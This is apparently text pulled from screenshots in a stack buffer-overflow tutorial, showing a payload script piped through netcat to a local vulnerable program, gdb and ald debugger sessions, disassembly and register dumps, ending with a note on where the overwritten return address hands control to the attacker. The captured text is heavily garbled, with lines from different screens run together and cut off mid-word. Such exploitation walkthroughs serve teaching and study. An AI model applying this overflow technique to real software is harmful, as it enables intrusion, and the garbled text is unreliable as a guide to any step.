&buf=0xbffff9b0
f
haking@live:/ramdisk/home/haking
[haking@live haking]$ ./egg_2.py | nc 127.0.0.1 9999 [haking@live haking]$ O
[haking@live haking]$ nc -l -p 9999 | g GNU gdb Red Hat Linux (5.3.90-0.2003071 Copyright 2003 Free Software Foundation GDB is free software, covered by the GN welcome to change it and/or distribute Type "show copying" to see the conditio There is absolutely no warranty for GDB This GDB was configured as "i386-redhat rary "/lib/tls/libthread_db.so.1".
Breakpoint 1 at 0x80483d6: file vuln.c, &buf=0xbffff9a0
Breakpoint 1, main (argc=2
6 num = read(0,buf
0xbffffaac: 0x40035770
7 printf ("num=%d\n
0xbffffaac: 0xbffffa1
[haking@live haking]$ nc &buf=0xbffff9b0 num=273
, argv=0xbfff ,atoi(argv[1]
num);
haking@live:/ramdisk/home/haking
08048431 E85EFEFFFF 08048436 8D9318FFFFFF 0804843C 8D8B18FFFFFF 08048442 29CA 08048444 31F6
08048446 C1FA02 08048449 39D6
0804844B 730F
Hit <return> to continue.
call near +0xfffffe5e
lea edx, [ebx+0xffffff18]
lea ecx, [ebx+0xffffff18]
sub edx, ecx
xor esi, esi
sar edx, 0x2
cmp esi, edx
jnc +0xf or <q> to quit
__libc_csu_ __libc_csu_ __libc_csu_ __libc_csu_ __libc_csu_ __libc_csu_ __libc_csu_ __libc_csu_
init+0x15) init+0x1a) init+0x20) init+0x26) init+0x28) init+0x2a) init+0x2d) init+0x2f)
ald> b 0x0804841B
Breakpoint 1 set for 0x0804841B
ald> c
Breakpoint 1 encountered at 0x0804841B
0x00000008 ebx = 0x40156238 ecx = 0x40154640 edx = 0x00000008
esp = 0xBFFFFABC ebp = 0x80CD5801 esi = 0xBFFFFB44 edi = 0xBFFFFB50
0x0000002B es = 0x0000002B fs = 0x00000000 gs = 0x00000033
0x0000002B cs = 0x00000023 eip = 0x0804841B eflags = 0x00000286
Flags: PF SF IF
0804841B C3 ald> |
retn
(main+0x6f)
[Note: this retn at main+0x6f pops its return address from [esp] = 0xBFFFFABC. If buf sits at 0xbffff9b0 as in the nc run with num=273, the read() data spans 0xbffff9b0–0xbffffac0 and so covers that slot; the saved ebp already reads 0x80CD5801 rather than a stack address, consistent with having been overwritten by the payload. This is the point where control passes to the attacker-supplied address — assuming the ald run has the same stack layout as the nc run.]